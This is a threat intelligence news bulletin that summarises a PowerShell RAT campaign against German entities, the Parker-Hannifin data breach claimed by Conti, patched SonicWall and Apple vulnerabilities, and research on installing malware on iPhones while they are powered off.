German Entities Targeted with PowerShell RAT
Threat actors are actively targeting German entities with custom PowerShell payloads to gather information about the ongoing conflict between Russia and Ukraine. The malicious remote access trojan (RAT) is masked as a downloadable reporting document on a clone site mimicking the official Baden-Württemberg website. Once downloaded, the user is met with a fake error message stating an error in the application, while in the background a PowerShell Base64 command is being executed to reach out to actor-controlled nodes of the fake website and download the associated payloads. Once completed, files "MonitorHealth.cmd" and "Status.txt" are dropped onto the compromised system. A scheduled tasking is set within the payload to execute "MonitorHealth.cmd" at a specific time each day to validate persistence on the system. "Status.txt" is a PowerShell RAT which collects device information such as current username, active working directory, and the device hostname, which is all paired with a unique user identifier. This information is exfiltrated in JSON format and sent to threat actor endpoints via HTTP POST requests. Built in security features allow the RAT to test the anti-virus and security measures within its current environment, avoiding the Windows Antimalware Scan Interface (AMSI) by utilizing a bypass function script. Indicators reveal that one of the command-and-control nodes where the POST information is exfiltrated to is "kleinm[.]de". Currently indicators do not tie any one actor to this PowerShell RAT, however CTIX analysts continue to monitor any chatter about this activity and will provide updates accordingly.
Threat Actor Activity
Motion and Control Technologies Corporation Discloses Data Breach Impacting Employees, Dependents, and More
Parker-Hannifin, a corporation based in Ohio that specializes in motion and control technologies, recently disclosed a data breach that exposed the personal information of employees. According to Parker, an unauthorized third party had access to the corporation's IT systems between March 11 and March 14 and, "may have acquired certain files." containing data pertaining to "current and former employees, their dependents, and members of Parker's Group Health Plans (including health plans sponsored by an entity acquired by Parker)." The data included names, Social Security numbers (SSNs), dates of birth, addresses, driver's license numbers, United States passport numbers, financial account information (such as bank account and routing numbers), enrollment information, health insurance plan member identification numbers, dates of coverage, and online account usernames and passwords. For a small portion of impacted individuals, the data also includes provider names, claims information, medical and clinical treatment information, and dates of service. The Conti ransomware group claimed responsibility on April 1, 2022, approximately one (1) month prior to Parker's data breach disclosure. The threat group initially posted 3% of the allegedly exfiltrated Parker data, followed by 100% of the 419 gigabytes (GB) of data on April 20, 2022. Full publications commonly occur when negotiations for the demanded ransom do not happen or when the threat group was never paid the ransom. CTIX analysts will continue to track Conti's activity.
- BleepingComputer: Parker Data Breach Article
- Cision PR Newswire: Parker Data Security Incident Notice
Critical Vulnerabilities in SonicWall VPN Appliances Allow for Remotely Bypassing Authentication
SonicWall identified a set of three (3) vulnerabilities affecting their SSLVPN Secure Mobile Access (SMA) 1000 series appliances, with one (1) of the flaws being deemed critical. The critical vulnerability, tracked as CVE-2022-22282, has been patched and is described as an unauthenticated access control bypass that could allow an unauthenticated remote attacker to slip past the authentication mechanism to gain access to internal resources, ultimately compromising the device to move laterally across the network. SMA 1000 SSLVPN products are deployed in many corporate networks across the world to streamline and secure remote access to enterprise resources in both local and cloud environments. At the time of this publication, there is no evidence that these vulnerabilities are being actively exploited, however, the exploit is extremely low-complexity, and does not require the end-user to interact with the attack at all. Due to the simple nature of the exploit, CTIX analysts urge any administrators managing SMA 1000 series appliances to update their products immediately. Due to their popularity, being used by more than 500,000 business customers from 215 countries and territories, SMA appliances have been heavily targeted by ransomware threat actors in the past. The other two (2) medium severity vulnerabilities have yet to be patched, and administrators should be monitoring SonicWall's security notices for updates. The vulnerabilities affect SMA 1000 Series models: 6200, 6210, 7200, 7210, 8000v (ESX, KVM, Hyper-V, AWS, Azure). CTIX analysts will continue to monitor this matter for changes and, if warranted, will publish an update in future FLASH summaries.
Apple Patches Critical Vulnerability Exploited In-the-Wild
Apple has released an emergency security patch that addresses a critical zero-day vulnerability which may have been exploited in-the-wild, affecting macOS, watchOS, and tvOS. The flaw, tracked as CVE-2022-22675, is described as an out-of-bounds write vulnerability which could allow an attacker to execute arbitrary code with kernel level privileges following the compromise of mobile applications on the vulnerable device. Specifically, the exploit is due to a flaw in the Apple Audio Video Decode (AppleAVD) kernel extension (kext), that decodes multiple A/V encoding mechanisms like HEVC, H.265, and VP9. Apple stated in their security advisory that the vulnerability "may have been actively exploited," but did not provide additional details. Analysts assess this is to allow as many Apple users as possible to update their vulnerable devices before the exploit becomes publicly known. According to Apple, the evidence suggests that the active exploits are very targeted, but they still state all users should consider updating their devices as soon as possible. The vulnerable operating system versions, as well as details about the patch, are available in the Apple advisory linked below.
Researchers Discover Vector to Implant Malware on iPhones While Device is Powered Off
Researchers from TU Darmstadt in Germany presented a novel way to infect an iPhone with malware while it is "off" at the ACM Conference on Security and Privacy in Wireless and Mobile Networks 2022 (WiSec 2022). Researchers determined that Apple’s introduction of additional capabilities of Low Power Mode (LPM), generated this vulnerability. Specifically, Bluetooth and Ultra-Wideband (UWB) chips are hardwired to the "Secure Element" (SE) in the NFC chip, giving the NFC, Bluetooth, and UWB chips access to information it would not normally have. LPM features are intended to increase user safety and convenience, for example, allowing Find My services to work even after shutdown through Apple’s Bluetooth Low Energy (BLE)-based offline finding network. However, researchers found that the Bluetooth firmware is "neither signed nor encrypted," allowing threat actors to overwrite the firmware and install their own malware. To do this, the attacker must exploit a flaw in the Bluetooth protocol, such as the Braktooth vulnerability discovered in September 2021. Given the fact that this vulnerability is hardware based, the issues presented by the researchers cannot be fixed with a system update. The researchers state the vulnerabilities associated with the new features will have "a long-lasting effect on the overall iOS security model." Due to the complexity of the attack and the short distance of Bluetooth communications, the average iPhone user does not have to worry about these security issues, though sophisticated threat actors could use the technique against high-value targets.
The Ankura semi-weekly Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence pertaining to current or emerging cyber events. The following is a collection of cyber threat intelligence leads assembled over the past few days and typically include high-level intelligence pertaining to recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to reach out to Flash (firstname.lastname@example.org) if additional context is needed.
© Copyright 2022. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.